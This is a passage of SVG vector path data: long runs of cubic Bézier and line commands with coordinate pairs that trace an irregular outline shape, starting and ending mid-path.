348.99751,151.5 C 349.55164,154.72574 352.01005,155.71626 356.60171,154.56383 C 359.26369,153.89572 359.83178,151.25642 357.50574,150.36383 C 356.6839,150.04846 356.27396,149.36573 356.59477,148.84666 C 356.94594,148.27846 357.72212,148.35442 358.54522,149.03753 C 359.29716,149.66159 360.35101,149.9011 360.8871,149.56978 C 361.42319,149.23846 362.14446,149.42472 362.48992,149.98369 C 362.83538,150.54266 364.44148,151 366.05902,151 C 367.67656,151 368.94671,151.3375 368.88158,151.75 C 368.52312,154.02023 369.22527,153.98333 371.07258,151.63486 C 373.38399,148.69638 375,148.22942 375,150.5 C 375,151.325 375.45,152 376,152 C 376.55,152 377,152.34015 377,152.75589 C 377,153.6508 373.57322,155.22849 365.91183,157.86087 C 362.83834,158.9169 359.41045,160.35123 358.2943,161.04828 C 357.17815,161.74533 355.53032,162.03375 354.63247,161.68921 C 352.17636,160.74671 352.6705,158.07577 355.5,157 C 356.875,156.47723 358,155.85549 358,155.61837 C 358,154.88992 353.61945,156.25182 351.43134,157.66055 C 350.29357,158.39306 348.15607,159.09225 346.68134,159.2143 C 345.2066,159.33635 344,159.68941 344,159.99887 C 344,160.30833 342.7516,161.03274 341.22577,161.60868 C 338.35652,162.6917 337.138,166.34922 339.21814,167.63482 C 339.87131,168.0385 340.02272,167.84577 339.59549,167.15451 C 339.20305,166.51953 339.35852,166 339.94098,166 C 340.52344,166 341,166.62391 341,167.38646 C 341,168.26302 339.34506,169.02109 336.5,169.44773 C 334.025,169.81888 332,170.54497 332,171.06127 C 332,171.57757 331.09035,172 329.97856,172 C 328.79278,172 327.48623,173.03349 326.81805,174.5 C 326.19155,175.875 325.34565,177 324.93826,177 C 324.53087,177 323.21896,178.65859 322.0229,180.68576 C 320.29566,183.61321 320.06184,184.84031 320.88641,186.65005 C 321.96545,189.01827 320.88484,190.66489 319.01145,189.50708 C 318.44283,189.15565 318.278,189.56088 318.62343,190.46105 C 319.04989,191.5724 318.32198,192.3404 316.11197,193.11081 C 314.40039,193.70747 313,194.60163 313,195.09783 C 313,195.59402 312.35389,196 311.56421,196 C 310.77452,196 308.03732,197.90306 305.48154,200.22903 C 300.23529,205.00354 300.10016,206.24327 303.78977,215.74958 C 306.03684,221.53914 305.56214,226.26764 302.67808,226.82332 C 301.75514,227.00115 301,226.65976 301,226.06467 C 301,225.46958 299.7625,223.59391 298.25,221.89653 C 296.7375,220.19915 295.47609,217.84054 295.44687,216.65519 C 295.41765,215.46983 294.81366,213.43955 294.10466,212.14344 C 293.04165,210.20016 292.28052,209.8939 289.76463,210.39707 C 287.9273,210.76454 286.11229,210.50859 285.20185,209.75363 C 284.37034,209.06413 281.26431,208.5 278.29956,208.5 C 273.28663,208.5 272.9468,208.65026 273.44739,210.64554 C 273.93512,212.58961 273.6342,212.76187 270.24283,212.48003 C 268.18428,212.30894 264.6914,211.65259 262.48089,211.02145 C 258.16671,209.78969 256.98535,210.08775 249.5,214.2966 C 245.88084,216.33158 245.5,216.92438 245.5,220.52286 C 245.5,222.71029 245.12346,225.08269 244.66325,225.79487 C 243.57975,227.4716 243.50347,234.65951 244.52842,238.5 C 245.6555,242.72316 248.95065,246.88459 252.48626,248.54989 C 255.09242,249.77742 256.23183,249.77509 260.91135,248.53265 C 266.38865,247.07839 267.95692,245.82343 267.98469,242.87244 C 268.00904,240.28451 270.34097,239.01175 275.91701,238.543 C 282.46747,237.99235 283.07616,239.22162 279.74098,246.26563 C 278.37587,249.14878 276.93619,253.41824 276.54168,255.75331 C 276.14717,258.08838 275.17064,260.36475 274.37162,260.81191 C 272.55299,261.82966 273.6178,265 275.77825,265 C 276.6386,265 278.16545,265.74474 279.17126,266.65499 C 280.17707,267.56523 281,267.83425 281,267.25281 C 281,266.67137 282.35,265.72504 284,265.14984 C 285.65,264.57465 287,263.6109 287,263.00818 C 287,262.40546 287.5625,261.98537 288.25,262.07465 C 291.67419,262.5193 292.38806,261.96011 290.28066,260.48403 C 288.8484,259.48084 286.63182,259.11342 283.72767,259.39781 C 281.31393,259.63418 278.80022,259.49456 278.14165,259.08755 C 277.48309,258.68053 279.94747,258.30198 283.61805,258.24631 C 292.77679,258.10743 296.50508,260.73929 293.89359,265.5 C 292.71682,267.64525 293.08398,276.47923 294.43566,278.54215 C 295.21084,279.72522 297.22728,281.26571 298.91664,281.96547 C 301.52235,283.04479 302.35973,282.99432 304.43791,281.63264 C 307.4278,279.67359 312.64196,280.45383 314.29973,283.10834 C 315.39069,284.85524 315.53982,284.84149 317.72021,282.79312 C 318.97409,281.61516 320,279.90067 320,278.98316 C 320,278.03823 321.62588,276.54399 323.75,275.53678 C 325.8125,274.55879 329.2361,272.87152 331.35799,271.7873 C 334.27844,270.29503 335.4935,270.09766 336.35799,270.97508 C 337.21736,271.84732 336.81248,272.63825 334.722,274.17089 C 331.82326,276.29613 328.27938,282 329.85769,282 C 330.35767,282 331.09619,283.0125 331.49885,284.25 C 331.90151,285.4875 332.34774,286.8375 332.49048,287.25 C 332.63322,287.6625 332.80625,288.39097 332.875,288.86883 C 332.94375,289.34668 334.35787,289.57955 336.01749,289.38632 C 337.93766,289.16275 339.672,289.672 340.78668,290.78668 C 341.98689,291.98689 343.74975,292.44541 346.38618,292.24309 C 349.73441,291.98615 350.13916,292.17842 349.50355,293.72391 C 347.93133,297.54674 347.81052,299.06676 348.96807,300.46152 C 349.63033,301.2595 349.91971,302.3209 349.61113,302.82019 C 349.07186,303.69274 352.58151,312 353.48941,312 C 353.73292,312 355.51139,311.24691 357.44157,310.32647 C 360.11296,309.05258 360.85243,308.15709 360.53825,306.57647 C 360.31123,305.43441 359.88046,303.32934 359.58098,301.89854 C 359.04714,299.34813 359.1293,299.30458 363.76823,299.67883 C 369.57129,300.14699 372.73305,298.23823 371.12661,295.23656 C 370.37015,293.82312 370.47298,292.76974 371.51225,291.28597 C 372.29168,290.17318 372.65587,288.9892 372.32157,288.6549 C 371.98726,288.3206 372.45315,287.76334 373.35687,287.41655 C 375.41262,286.62768 375.50903,285 373.5,285 C 372.675,285 371.98839,284.2125 371.9742,283.25 C 371.95857,282.18961 370.33942,280.75744 367.86534,279.61563 C 364.48338,278.05483 363.1737,277.91804 360.2382,278.81897 C 357.93927,279.52453 356.0683,279.57174 354.91281,278.95334 C 353.93308,278.429 351.85191,278 350.28798,278 C 348.67365,278 346.69768,277.1278 345.71687,275.9823 C 344.44467,274.49648 343.26575,274.12308 341.24463,274.56582 C 335.95753,275.72399 335.80997,275.85831 336.47891,278.90397 C 337.14535,281.93827 335.58868,283.98868 333.90037,282.30037 C 332.16169,280.56169 334.03552,275.2079 336.60878,274.56205 C 337.92395,274.23197 339,273.29547 339,272.48095 C 339,271.66643 339.45,271 340,271 C 340.55,271 341,271.45 341,272 C 341,272.55 341.66088,273 342.46862,273 C 343.27635,273 343.80011,272.4375 343.63251,271.75 C 343.46491,271.0625 343.55404,270.95 343.83056,271.5 C 344.10709,272.05 344.25833,272.6125 344.16667,272.75 C 344.075,272.8875 344.9,273.9 346,275 C 347.19192,276.19192 349.33333,277 351.3,277 C 353.115,277 355.06475,277.46475 355.63278,278.03278 C 356.95704,279.35704 360,278.21449 360,276.39301 C 360,275.62686 360.675,275 361.5,275 C 362.325,275 363,275.38394 363,275.85321 C 363,276.32247 365.26972,276.48832 368.04381,276.22177 C 371.98697,275.84288 373.02351,276.03858 372.79381,277.11856 C 372.63222,277.87835 372.05,278.83061 371.5,279.23469 C 370.88069,279.68968 370.97587,279.9752 371.75,279.98469 C 372.4375,279.99311 373,280.9 373,282 C 373,283.30232 373.66667,284 374.91111,284 C 375.96221,284 377.87471,285.24765 379.16111,286.77255 C 383.13584,291.48425 386.10279,293 391.35078,293 C 398.26534,293 406.56719,297.75293 407.56172,302.281 C 407.95035,304.05042 409.1688,306.27911 410.2694,307.23365 C 411.82872,308.58604 412.016,309.2758 411.11775,310.35812 C 410.20811,311.45416 410.4885,312.09006 412.44733,313.37353 C 413.8126,314.26809 415.42202,315 416.02383,315 C 416.62564,315 416.86586,315.40803 416.55764,315.90674 C 416.24942,316.40545 416.86813,316.58574 417.93256,316.30739 C 420.46302,315.64566 426.18339,317.56982 429.54368,320.21302 C 431.01143,321.36755 433.40205,322.44069 434.85616,322.59776 C 443.94147,323.57918 448.11766,324.91603 452.77256,328.33304 C 455.52003,330.34987 458.66557,332 459.76266,332 C 461.62506,332 462.46061,333.31728 464.39566,339.30416 C 465.05464,341.34298 460.78211,350.46076 458.58997,351.6938 C 457.80165,352.13721 455.61368,354.525 453.7278,357 C 450.74001,360.92115 450.23191,362.44181 449.77787,368.8216 C 449.49128,372.84848 448.74902,376.65098 448.1284,377.2716 C 447.50778,377.89222 446.98999,379.5475 446.97776,380.95 C 446.96553,382.3525 446.07554,384.625 445,386 C 443.92446,387.375 443.03447,389.25718 443.02224,390.18261 C 443.01001,391.10805 442.10914,392.14797 441.02031,392.49355 C 439.93149,392.83913 439.14399,393.62551 439.27031,394.24105 C 439.4005,394.87542 437.98387,395.42749 436,395.51551 C 426.49045,395.93742 415.70812,402.63488 416.10347,407.87425 C 416.47822,412.84063 416.00009,415 414.52568,415 C 413.7148,415 412.31217,416.4625 411.40871,418.25 C 409.18594,422.64776 405.93105,426.07542 404.70013,425.31467 C 404.1451,424.97164 403.97567,425.15162 404.32362,425.71461 C 404.67157,426.27761 403.48103,428.25964 401.67798,430.11912 C 399.87493,431.9786 398.0989,434.2875 397.73124,435.25 C 397.36358,436.2125 396.26115,437.04768 395.28138,437.10596 C 392.2859,437.28414 387.60794,436.91252 385.5,436.32893 C 383.93882,435.8967 383.75712,436.04602 384.67186,437.00946 C 385.31638,437.6883 385.60573,438.86388 385.31487,439.62186 C 385.00077,440.44038 385.43857,441 386.39301,441 C 388.41691,441 388.47994,443.35679 386.5,445 C 385.675,445.68469 385,446.81991 385,447.5227 C 385,448.67772 381.74362,449.70323 372.31515,451.51746 C 369.81809,451.99795 368.99104,452.7643 368.48548,455.06609 C 367.77543,458.29895 364.74157,459.65392 360.56188,458.60489 C 358.54251,458.09806 358.15039,458.34633 358.27875,460.05046 C 358.39844,461.63932 358.93002,461.9834 360.61261,461.56109 C 364.4587,460.59579 364.4204,463.83188 360.56397,465.67088 C 358.241,466.77863 357.27932,467.85408 357.51542,469.08007 C 357.90969,471.12735 356.58656,472.42614 353,473.51239 C 351.625,473.92884 350.18824,474.75632 349.8072,475.35124 C 348.77721,476.95939 350.91094,479 353.62244,479 C 355.24528,479 356,479.57139 356,480.8 C 356,483.09708 354.10572,485 351.81905,485 C 350.77846,485 349.79035,485.98711 349.44213,487.37453 C 349.11435,488.68052 347.75578,490.24588 346.42308,490.85309 C 343.69392,492.09658 343.29438,494.1695 345.44056,495.95067 C 346.23287,496.60823 346.6962,497.67583 346.47019,498.32311 C 345.31373,501.63521 353.21376,505.98065 360.41667,505.99442 C 364.7857,506.00278 363.19243,506.68434 357.11952,507.40487 C 354.16026,507.75598 351.3515,508.28276 350.87783,508.5755 C 349.00343,509.73395 342.26391,509.50308 338,508.13436 z M 351.25,505.41556 C 349.4625,504.63385 348,503.54555 348,502.99713 C 348,502.44871 347.55,502 347,502 C 346.45,502 346,502.87011 346,503.93358 C 346,505.27528 346.84179,505.99468 348.75,506.28375 C 353.87649,507.06034 354.50887,506.84073 351.25,505.41556 z M 345,502.05902 C 345,500.44148 344.48047,498.79695 343.84549,498.40451 C 343.13432,497.96498 342.96226,498.12992 343.39743,498.83404 C 343.85455,499.57367 343.55615,499.76691 342.55194,499.38156 C 341.69837,499.05401 341,499.28417 341,499.89301 C 341,500.50186 341.45,501 342,501 C 342.55,501 343,501.48032 343,502.06739 C 343,502.68812 342.05847,502.87989 340.75,502.52567 C 338.67198,501.96313 338.69109,502.03171 341,503.42285 C 344.52541,505.54695 345,505.38514 345,502.05902 z M 337,502.10699 C 337,501.61583 336.34792,500.96375 335.55093,500.65792 C 334.58241,500.28626 334.28626,500.58241 334.65792,501.55093 C 335.26488,503.13266 337,503.54461 337,502.10699 z M 343.66667,497.66738 C 344.85833,497.57532 345.61284,497.27951 345.34335,497.01001 C 344.58461,496.25128 332.0064,496.41198 332.003,497.18045 C 331.99855,498.18996 336.13857,498.85996 339,498.3128 C 340.375,498.04988 342.475,497.75944 343.66667,497.66738 z M 341.5,495.23469 C 342.05,494.83061 342.64625,493.825 342.825,493 C 343.00375,492.175 343.54097,491.35843 344.01882,491.18539 C 344.49668,491.01236 344.60367,490.11236 344.25659,489.18539 C 343.71517,487.73939 343.85635,487.6876 345.2505,488.82076 C 346.6585,489.96519 347.08746,489.73154 348.46341,487.07076 C 349.37137,485.31495 350.84685,484 351.90905,484 C 352.93078,484 354.00209,483.1 354.28975,482 C 354.66574,480.56221 354.32043,480 353.06137,480 C 350.7818,480 347.5963,476.46222 348.52412,474.96098 C 348.92014,474.3202 350.76422,473.16081 352.62208,472.38455 C 354.47993,471.60828 356.05625,470.5292 356.125,469.98658 C 356.19375,469.44396 356.30625,468.56937 356.375,468.04305 C 356.44375,467.51672 357.32813,466.48055 358.3403,465.74043 C 360.01115,464.51868 360.03417,464.27325 358.5903,463.07494 C 357.71563,462.34903 357,460.72485 357,459.46565 C 357,457.37962 357.42021,457.19058 361.72928,457.3381 C 364.86732,457.44552 366.5076,457.07942 366.60428,456.25 C 366.68443,455.5625 366.85807,454.6625 366.99015,454.25 C 367.12224,453.8375 367.1502,452.7125 367.0523,451.75 C 366.95439,450.7875 367.37913,450 367.99616,450 C 368.61319,450 368.88094,450.38362 368.59117,450.85249 C 368.10859,451.63332 369.9724,451.30398 380,448.83653 C 381.925,448.36286 384.33161,446.82523 385.34803,445.41958 C 387.10368,442.99161 387.10854,442.79985 385.44526,441.58363 C 384.48231,440.87951 384.01357,439.78706 384.40361,439.15596 C 384.8281,438.46913 384.0474,437.52309 382.45881,436.79928 C 380.09626,435.72283 379.87511,435.20079 380.44482,432.04502 C 380.79681,430.09526 381.29854,426.925 381.55977,425 C 381.90815,422.43286 383.4294,420.14223 387.26737,416.40574 C 390.14532,413.60389 393.5125,410.77556 394.75,410.12055 C 395.9875,409.46555 397,408.04547 397,406.96482 C 397,404.40099 395.31503,404.43205 394.49652,407.01097 C 393.58621,409.8791 389.16556,411.75489 384.5,411.25273 C 382.3,411.01594 380.36114,410.68585 380.19142,410.51919 C 380.0217,410.35253 380.52442,408.68064 381.30858,406.80388 L 382.73433,403.3916 L 378.91905,401.1958 C 376.82064,399.98811 374.4136,399 373.57007,399 C 372.72654,399 370.41456,397.425 368.43234,395.5 C 364.49703,391.6783 362.2825,391.10024 361.30779,393.6403 C 360.72551,395.15768 360.58773,395.15667 359.46903,393.62676 C 358.72358,392.6073 357.34684,392.1414 355.87985,392.41215 C 354.57093,392.65373 353.13909,392.88482 352.69798,392.92569 C 352.25687,392.96656 351.43176,394.33161 350.8644,395.95914 C 350.29704,397.58667 348.98693,399.18676 347.95305,399.5149 C 346.38947,400.01116 346.12302,400.94321 346.36902,405.05576 C 346.53169,407.77509 346.3344,410 345.93059,410 C 345.52679,410 344.21844,411.4625 343.02315,413.25 C 340.71642,416.69959 340.69177,416.24047 342.9426,411.75 C 343.70074,410.2375 344.58954,409 344.91772,409 C 345.2459,409 345.35951,407.05241 345.17019,404.67202 C 344.87226,400.92597 345.17382,400.11613 347.41299,398.64897 C 350.15795,396.8504 350.83326,395 348.74469,395 C 347.44442,395 345.0389,389.37102 344.47123,385 C 343.9014,380.61236 342.80278,378 341.52741,378 C 340.67013,378 340.29882,379.92666 340.3229,384.25 C 340.34204,387.6875 340.02348,393.2 339.61498,396.5 C 339.20647,399.8 338.64288,404.50396 338.36254,406.95323 C 338.0822,409.40251 337.41668,412.22142 336.88361,413.21748 C 336.35054,414.21354 335.75859,418.73458 335.56817,423.26425 C 335.2415,431.03519 333.80415,437.31502 331.86352,439.45 C 331.38858,439.9725 331,441.06207 331,441.87126 C 331,442.68045 330.33207,444.08057 329.51571,444.98264 C 328.4228,446.19029 328.25921,447.41703 328.89531,449.63496 C 329.49243,451.717 329.34412,453.39644 328.41503,455.07358 C 326.33321,458.83159 326.66455,460.11334 329.61569,459.71813 C 332.66883,459.30926 335.04532,454.26892 335.56826,447.09319 C 335.74489,444.66945 336.29723,442.41945 336.79568,442.09319 C 338.85948,440.74234 339.76236,433.01121 338.55834,427 C 338.05412,424.4826 338.30009,422.93851 339.43448,421.5 C 340.95023,419.5779 340.97524,419.6024 340.07656,422.12906 C 339.00705,425.13603 339.13792,426.66911 340.70699,429.51403 C 341.55109,431.04449 341.47161,432.35138 340.37599,434.95709 C 339.583,436.84306 339.14725,438.94135 339.40766,439.61995 C 339.66806,440.29855 339.20512,441.4148 338.3789,442.1005 C 337.5312,442.80404 336.96502,444.68761 337.07942,446.42362 C 337.19093,448.11563 336.70672,450.85 336.0034,452.5 C 335.30008,454.15 334.61863,457.13818 334.48908,459.14039 C 334.35952,461.14261 333.94492,463.28011 333.56774,463.89039 C 333.19057,464.50068 333.41098,465 334.05756,465 C 334.7723,465 335.04581,465.98004 334.75525,467.5 C 334.42692,469.21756 334.72188,470 335.69769,470 C 336.55088,470 336.82072,470.48107 336.37344,471.20477 C 335.96392,471.8674 335.48153,473.75529 335.30146,475.40009 C 335.1214,477.04488 334.2862,479.44045 333.44548,480.72356 C 332.60475,482.00667 332.15211,483.43711 332.43962,483.90231 C 332.72713,484.3675 331.90439,485.54262 330.61131,486.51368 C 327.88401,488.5618 328.20069,492 331.11663,492 C 332.33333,492 333,492.70795 333,494 C 333,495.64717 333.66156,495.9973 336.75,495.98469 C 338.8125,495.97627 340.95,495.63877 341.5,495.23469 z M 331,494 C 330.175,493.46684 329.05,493.03063 328.5,493.03063 C 327.95,493.03063 328.175,493.46684 329,494 C 329.825,494.53316 330.95,494.96937 331.5,494.96937 C 332.05,494.96937 331.825,494.53316 331,494 z M 331.38541,482.42785 C 332.42239,480.26753 333.4716,477.0375 333.71699,475.25 C 334.10622,472.41475 333.87625,472 331.91491,472 C 330.67838,472 329.95337,472.2867 330.30379,472.63712 C 330.65421,472.98754 330.05421,474.51951 328.97045,476.04149 C 326.61146,479.35439 326.48449,480.86495 328.5,481.63837 C 330.44121,482.38328 330.44121,484 328.5,484 C 327.675,484 327,484.7125 327,485.58333 C 327,488.28112 329.40718,486.54905 331.38541,482.42785 z M 332.60875,466.18018 C 331.13042,464.70185 331,464.70377 331,466.20393 C 331,467.1018 331.29205,468.59749 331.64899,469.52767 C 332.25618,471.10997 332.35981,471.10844 333.25774,469.50392 C 333.94669,468.27284 333.76357,467.335 332.60875,466.18018 z M 327,464.94098 C 327,464.35852 326.55,464.16008 326,464.5 C 324.71862,465.29194 324.71862,466 326,466 C 326.55,466 327,465.52344 327,464.94098 z M 397.66572,432.73751 C 398.59578,429.7071 398.44597,429.11146 396.26509,427.16891 C 394.92194,425.97253 392.77039,424.72949 391.48386,424.40659 C 390.19733,424.08369 388.90128,423.18512 388.60374,422.40975 C 387.93474,420.66636 383.41086,420.53445 383.12518,422.25 C 383.01069,422.9375 382.75362,426.2 382.55391,429.5 L 382.19079,435.5 L 389.40753,435.81544 L 396.62427,436.13089 L 397.66572,432.73751 z M 401.63529,428.31697 C 402.71145,424.02921 406.2883,419.42794 408.25,419.80779 C 409.2125,419.99416 410,419.69818 410,419.15005 C 410,418.60192 411.12368,416.81803 412.49708,415.18584 C 414.39108,412.93495 414.95415,411.1972 414.8285,407.99058 C 414.69505,404.58482 415.13304,403.40187 417.08142,401.90577 C 420.65396,399.16252 430.23557,394.59263 432.25,394.67121 C 433.2125,394.70875 434,394.32153 434,393.81072 C 434,393.2999 434.49291,393.1866 435.09535,393.55893 C 438.03687,395.37689 446,385.63496 446,380.21841 C 446,379.21828 446.53579,377.86421 447.19065,377.20935 C 447.84551,376.55449 448.51619,372.52699 448.68105,368.25935 C 449.00519,359.86836 449.50746,357.57756 450.84222,358.40249 C 451.31321,358.69358 452.31578,357.77847 453.07015,356.36892 C 453.82452,354.95936 455.72687,352.72472 457.29759,351.40305 C 458.86831,350.08137 459.86178,349 459.5053,349 C 459.14881,349 459.56361,348.29353 460.42707,347.43007 C 462.66935,345.18779 463.42622,341.27133 462.39285,337.25802 C 461.66935,334.44816 460.77515,333.54351 457.67841,332.48846 C 455.57654,331.77236 453.32654,330.55052 452.67841,329.77326 C 450.27185,326.88722 445.94519,325 441.73518,325 C 439.35083,325 436.88865,324.48865 436.26366,323.86366 C 435.41521,323.01521 434.2439,323.24856 431.6403,324.78472 L 428.15327,326.84212 L 428.43304,324.21804 C 428.65579,322.12885 428.0294,321.22768 425.36003,319.79698 C 422.01533,318.00433 416.77598,317.32795 417.25,318.75 C 417.3875,319.1625 417.05,319.69286 416.5,319.92857 C 415.95,320.16429 414.94542,320.91173 414.26759,321.58955 C 413.06287,322.79428 409,322.4187 409,321.10261 C 409,320.73733 410.39488,319.91197 412.09974,319.26845 C 413.8046,318.62494 415.0164,317.54919 414.79263,316.87789 C 414.23345,315.20034 409.9317,315.01442 409.30758,316.64084 C 409.02893,317.36699 407.77092,317.87588 406.51201,317.77168 C 405.10414,317.65517 404.41294,317.08747 404.71632,316.29687 C 404.98761,315.58991 405.61242,315.26046 406.10478,315.56476 C 406.59715,315.86906 407,315.56441 407,314.88776 C 407,314.21111 407.78153,312.7939 408.73672,311.73842 C 410.26051,310.05466 410.29116,309.67717 408.98672,308.65968 C 408.16903,308.02186 407.35922,306.67525 407.18715,305.66722 C 407.01509,304.65919 406.53049,302.90502 406.11028,301.76907 C 405.40354,299.85857 405.18249,299.96866 403.16234,303.23733 C 400.85246,306.97479 396.87613,308.53926 393.83009,306.90907 C 392.6704,306.28842 391.66569,306.47717 390.6332,307.50965 C 389.62329,308.51957 388.90892,308.66164 388.46362,307.94114 C 388.09848,307.35033 388.10729,306.55938 388.4832,306.18347 C 389.19784,305.46883 389.77158,305.33112 392.89301,305.125 C 395.29621,304.96631 396.2999,302.42889 394.95414,299.91431 C 394.22392,298.54987 394.2474,297.45773 395.03323,296.23675 C 396.07273,294.62163 396.11096,294.62763 395.57909,296.32244 C 395.26454,297.32479 395.47139,299.01229 396.03877,300.07244 C 396.75931,301.41879 396.7338,302.62888 395.95416,304.08565 C 394.57037,306.67129 394.83621,306.95094 398.08458,306.32674 C 399.50609,306.05358 401.3843,304.61944 402.25837,303.13975 C 403.71847,300.668 403.7116,300.27283 402.1738,298.27606 C 401.25321,297.08071 399.375,295.68536 398,295.17528 C 394.73744,293.96497 385.44806,294.20979 385.67897,295.5 C 385.7774,296.05 385.2149,296.85986 384.42897,297.29969 C 382.90834,298.15068 382.42558,302 383.83948,302 C 384.72721,302 387,306.391 387,308.10607 C 387,308.66265 386.56271,308.84777 386.02825,308.51746 C 385.49378,308.18714 383.95624,308.63779 382.61149,309.5189 C 380.55084,310.8691 379.83319,310.91493 378.04612,309.81046 C 375.39344,308.17103 374.33845,304.28896 375.87636,301.82638 C 376.81459,300.32402 376.74592,299.83973 375.52839,299.37252 C 374.69409,299.05237 374.2175,298.45709 374.4693,298.04968 C 374.7211,297.64226 372.8562,298.35735 370.32509,299.63876 C 367.43268,301.10308 364.84578,301.74841 363.36153,301.37589 C 361.26272,300.84912 361,301.1255 361,303.86021 C 361,306.1845 361.36695,306.79642 362.5,306.36163 C 363.325,306.04504 364,306.21265 364,306.73408 C 364,307.25552 361.674,308.94811 358.83112,310.4954 L 353.66224,313.30865 L 351.55318,310.85672 C 349.7938,308.81132 348.74504,308.47146 345.22763,308.8069 C 342.90856,309.02806 341.26019,309.61198 341.56459,310.1045 C 341.86898,310.59703 341.64148,311 341.05902,311 C 340.47656,311 340,310.325 340,309.5 C 340,308.52778 341.05556,307.95602 343,307.875 C 344.65,307.80625 346.45,307.6375 347,307.5 C 347.55,307.3625 348.53601,307.19375 349.19113,307.125 C 349.86032,307.05477 349.57485,306.40961 348.53964,305.65264 C 347.30924,304.75295 347.06708,304.07658 347.8108,303.61693 C 348.62845,303.1116 348.62605,302.27337 347.80178,300.46429 C 346.96719,298.63258 346.97398,297.35252 347.82821,295.47769 C 348.95102,293.01339 348.89662,292.96429 345.46286,293.34268 C 342.99604,293.61453 341.68405,293.25784 341.06197,292.14624 C 340.54603,291.22432 338.76835,290.52648 336.80795,290.47631 C 332.60494,290.36874 331,289.41155 331,287.01241 C 331,285.98416 330.30643,284.44928 329.45873,283.60158 C 328.07036,282.21322 328.07885,281.73489 329.54428,278.78015 C 330.43903,276.97607 332.3701,274.46223 333.83555,273.19385 L 336.5,270.88771 L 331.5,273.19385 C 328.75,274.46223 326.21281,275.89515 325.8618,276.37812 C 325.5108,276.86108 324.72521,276.9482 324.11606,276.57173 C 323.47293,276.17426 322.49225,277.06402 321.77735,278.69361 C 321.10021,280.23713 319.7483,282.22778 318.7731,283.1173 C 317.79789,284.00681 317,285.19616 317,285.76031 C 317,286.32445 316.29397,287.05695 315.43105,287.38809 C 314.46074,287.76043 314.08033,288.67774 314.43405,289.79221 C 314.74862,290.78334 315.18225,294.13174 315.39767,297.23311 C 315.80318,303.07117 315.26731,304.19219 310.50999,307.45804 C 308.5734,308.78749 308.59354,308.85768 311.25999,310.0726 C 312.767,310.75924 314,311.63955 314,312.02885 C 314,312.41814 315.84794,312.98452 318.10654,313.28746 C 320.90458,313.66276 323.17286,314.81995 325.2252,316.91913 C 326.88186,318.61361 328.63392,320 329.11866,320 C 329.6034,320 330,320.62554 330,321.39009 C 330,322.39659 330.94669,322.6526 333.43075,322.31784 C 335.31766,322.06356 337.76244,322.33768 338.8636,322.927 C 340.51655,323.81163 340.97614,323.65052 341.499,322.00316 C 341.84731,320.90573 341.55324,318.40649 340.84551,316.4493 C 339.75316,313.42846 339.78094,312.75022 341.02936,311.96069 C 342.95053,310.7457 344,310.75959 344,312 C 344,312.55 343.27252,313 342.38337,313 C 341.14356,313 340.94765,313.52446 341.54287,315.25 C 342.61068,318.34555 342.3031,325.92986 341.04846,327.44161 C 340.48135,328.12494 340.25352,328.92019 340.54218,329.20884 C 340.83083,329.4975 339.20734,330.03104 336.93441,330.3945 C 332.28069,331.13866 330,332.9236 330,335.82158 C 330,336.90202 329.34965,338.03559 328.55478,338.34061 C 327.43107,338.77181 327.31394,339.60784 328.02827,342.09857 C 329.65622,347.77489 334.8151,350.7849 337.8,347.8 C 338.73333,346.86667 339,347.17622 339,349.19301 C 339,353.3736 344.19703,354.35783 348.79049,351.04716 C 350.28072,349.97311 352.7375,348.79932 354.25,348.43876 C 356.84568,347.81997 357,347.97698 357,351.2366 C 357,355.05388 359.47553,358.00946 362.8881,358.26652 C 364.04965,358.35402 365,358.77985 365,359.2128 C 365,359.64576 365.675,360 366.5,360 C 367.325,360 368,360.49814 368,361.10699 C 368,361.71583 368.71156,361.94093 369.58125,361.60719 C 371.58257,360.83922 374.52717,362.95393 374.65362,365.25 C 374.97773,371.13492 374.88609,371 378.55902,371 C 380.84585,371 381.88019,371.38483 381.45266,372.07659 C 381.08671,372.66871 381.73515,374.03624 382.89365,375.11554 C 385.40024,377.45079 385.4205,377.67005 383.47454,381.40151 C 382.57441,383.12755 382.24942,385.15317 382.67234,386.40151 C 383.06336,387.55568 383.25863,389.3473 383.10627,390.3829 C 382.87853,391.93088 383.30983,392.17393 385.53104,391.74931 C 388.45744,391.1899 392,393.79149 392,396.5 C 392,397.35244 392.89772,398 394.07946,398 C 395.84933,398 396.06496,398.42776 395.52785,400.87321 C 395.06844,402.96489 395.31883,403.90837 396.44839,404.34182 C 398.83463,405.25751 398.37266,409.73421 395.75,411.10951 C 392.68186,412.71842 385.99958,418.01347 386.00179,418.83403 C 386.00277,419.20031 388.14027,420.81363 390.75179,422.41918 C 396.82072,426.15034 400.08113,429.05972 399.41016,430.14536 C 399.11965,430.61541 399.34995,431 399.92193,431 C 400.49391,431 401.26493,429.79264 401.63529,428.31697 z M 392.50622,407.99313 C 393.40046,407.005 394.2826,404.57732 394.46654,402.59827 C 394.73942,399.66212 394.46587,399 392.97993,399 C 391.76967,399 390.93792,397.99383 390.5,396 C 389.81791,392.89447 389.37801,392.66367 384.7282,392.97169 C 382.26701,393.13473 381.97933,392.83843 382.16103,390.32765 C 382.49077,385.77119 380.42569,382.99789 376.71482,383.01365 C 370.82219,383.03868 369.09359,384.00283 368.02153,387.86246 C 367.46582,389.86311 367.00864,391.81929 367.00558,392.20953 C 366.99609,393.41667 372.40217,398 373.83549,398 C 375.07751,398 379.82133,400.30744 382.67412,402.2992 C 383.56205,402.91913 383.50447,403.94171 382.4379,406.49438 C 381.04482,409.8285 381.06104,409.87374 383.76378,410.19038 C 387.92342,410.67772 390.71066,409.97719 392.50622,407.99313 z M 351.75871,392.01017 C 352.93341,390.91577 354.15768,390.44611 354.47929,390.9665 C 354.80091,391.48688 355.73037,391.65696 356.54476,391.34445 C 357.35915,391.03194 358.69474,391.33169 359.51273,392.01057 C 360.44429,392.78369 361,392.85031 361,392.18887 C 361,391.60805 362.21149,390.99045 363.69221,390.81642 C 365.78867,390.57002 366.57177,389.77207 367.23104,387.21049 C 368.24802,383.25906 371.52025,381.71934 377.92009,382.18083 C 382.02847,382.47709 382.40003,382.29982 383.09702,379.71098 C 383.68582,377.52399 383.4326,376.6626 381.92395,375.72043 C 380.86578,375.05959 380,373.95215 380,373.25945 C 380,372.52673 378.74534,372 377,372 C 374.85814,372 373.96349,371.49942 373.87238,370.25 C 373.3695,363.35444 373.12323,362.82743 370.28165,362.56613 C 369.30174,362.47602 365.90722,361.1316 362.73828,359.57853 C 358.40321,357.45395 356.83497,356.10419 356.40475,354.12738 C 355.29131,349.0112 355.24039,348.95811 352.46037,350.01507 C 351.02432,350.56105 349.17613,351.68102 348.35326,352.50388 C 347.5304,353.32675 345.94114,354 344.82158,354 C 